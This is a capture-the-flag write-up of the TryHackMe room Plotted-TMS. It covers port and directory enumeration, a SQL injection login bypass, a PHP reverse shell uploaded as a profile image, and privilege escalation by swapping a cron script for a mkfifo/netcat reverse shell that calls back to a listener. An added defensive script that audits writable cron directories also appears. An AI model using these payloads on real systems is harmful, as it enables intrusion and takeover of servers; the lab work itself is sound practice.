Plotted-TMS is an easy room, but everything here is plotted! Hacking a Traffic Offense Management System.

First let's scan the IP and find some information to work with.

Enumerate, enumerate, enumerate
Detect open ports:
nmap -sC -sV plotted.thm
After running nmap we detect three open ports: 22, 80 and 445. If you pay attention, port 445 is not a Samba server but an HTTP server running Apache.

At this point we have:
- 1 SSH Server (22)
- 2 HTTP Servers (80-445)
Both webservers show the Apache default webpage, so it's time to enumerate them and find some juice.
Find folders and files on Webservers
dirb http://plotted.thm

Port 80 has nothing of interest.

We have another port to investigate, port 445.
dirb http://plotted.thm:445

firefox http://plotted.thm:445/management

Great, we found a Traffic Offense Management System webapp to investigate, and a link to the login system.

Great, we have a PHP login page. Here I tried the common admin:admin but it failed, so it's time for SQLi. After a few manual tests I am in!
admin' or 1+1--'

Checking the profile page, it is possible to upload a profile image... or maybe a reverse shell? 😀
Learn how to generate metasploit payloads!

You can also use sqlmap; the username parameter is vulnerable.

Upload a PHP reverse shell as the profile picture, open a netcat listener on port 1234, then open the uploaded "image" and you have a shell.
Here I describe two options, using netcat or msfconsole. I usually use msfconsole, to be able to execute other procedures on the remote system and because it is easier to upgrade to a Meterpreter shell.
msfconsole -q -x "use multi/handler; set payload generic/shell_reverse_tcp; set lhost 10.8.154.49; set lport 1234; exploit"
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost 10.10.181.46
lhost => 10.10.181.46
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > run
firefox http://10.10.114.80:445/management/uploads/1645711140_rshell.php

nc -lnp 1234

Stabilize the shell:
python3 -c "import pty;pty.spawn('/bin/bash')"

export TERM=xterm
Now it is time to escalate our privileges. I will run LinPEAS and check the output.


And LinPEAS found our entry point: a cron job running a script as plot_admin.

Let's verify our permissions on that folder.
ls -la /var/www/
The scripts folder is owned by our user/group, which is great: we can create files inside it or manipulate what is already there.

ls -la /var/www/scripts

As we can see, there is a script inside owned by user plot_admin.
Let's think a little bit.
We are the owners of the folder and someone else created a script inside it. Do we have permission to write into that script? No, but owning the directory means we can rename the script and create a new one with the same name.
The cron job output tells us the script will be run as the plot_admin user. So?
If we replace the content of the script with a bash reverse shell, it will be executed as plot_admin.
Let's see!

mv /var/www/scripts/backup.sh /var/www/scripts/backup_rfs.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.44.169 4444>/tmp/f
nc -lp 1234
chmod 777 /var/www/scripts/backup.sh
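The weakness used above is a cron script sitting in a directory writable by a different user: the script file itself can be read-only and still be swapped out by renaming it. The following audit is an added example, not part of the original writeup; it builds its own scripts directories in a temp dir (on a real host you would point it at /var/www/scripts and plot_admin) and assumes GNU stat.

```shell
#!/bin/sh
# Added example (not from the writeup): flag cron scripts whose parent
# directory can be modified by someone other than the user the job runs as,
# and show why that matters even when the script file is not writable.

# check_script_dir SCRIPT EXPECTED_OWNER -> prints "safe" or "unsafe".
# Unsafe if the directory is writable by group/others or is owned by a user
# other than the one cron runs the script as (they can rename/replace it).
check_script_dir() {
    dir=$(dirname "$1")
    owner=$(stat -c %U "$dir")
    mode=$(stat -c %a "$dir")             # e.g. 755 or 777 (GNU stat)
    group_w=$(( (mode / 10 % 10) & 2 ))   # write bit of the group digit
    other_w=$(( (mode % 10) & 2 ))        # write bit of the others digit
    if [ "$owner" != "$2" ] || [ "$group_w" -ne 0 ] || [ "$other_w" -ne 0 ]; then
        echo unsafe
    else
        echo safe
    fi
}

# swap_readonly_script DIR: creates a read-only backup.sh in DIR, renames it
# and drops a new backup.sh in its place. Returns 0 if the swap succeeded,
# i.e. directory write access alone was enough to change what cron runs.
swap_readonly_script() {
    printf '#!/bin/sh\necho original\n' > "$1/backup.sh"
    chmod 444 "$1/backup.sh"                       # file itself not writable
    mv "$1/backup.sh" "$1/backup_rfs.sh" &&        # rename needs only dir write
    printf '#!/bin/sh\necho replaced\n' > "$1/backup.sh" &&
    sh "$1/backup.sh" | grep -q replaced
}

# Constructed demo: a 777 scripts dir like the one on the box, a 755 one
# owned by the cron user, and a 755 one owned by someone else (plot_admin
# here is just the expected owner name, not a real account on this host).
demo() {
    base=$(mktemp -d)
    me=$(id -un)
    mkdir -m 777 "$base/scripts"
    mkdir -m 755 "$base/hardened"
    echo "777 dir, owned by cron user: $(check_script_dir "$base/scripts/backup.sh" "$me")"
    echo "755 dir, owned by cron user: $(check_script_dir "$base/hardened/backup.sh" "$me")"
    echo "755 dir, cron runs as plot_admin: $(check_script_dir "$base/hardened/backup.sh" plot_admin)"
    swap_readonly_script "$base/scripts" && echo "read-only backup.sh was replaced"
    rm -rf "$base"
}

demo
```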

cat /home/plot_admin/user.txt
TryHackMe Plotted-TMS PWNED

doas -u root openssl enc -in /root/root.txt
Congratulations on completing this room!
53f85e-RFS-040a9bdcab
Hope you enjoyed the journey!
Do let me know if you have any ideas/suggestions for future rooms.
-sa.infinity8888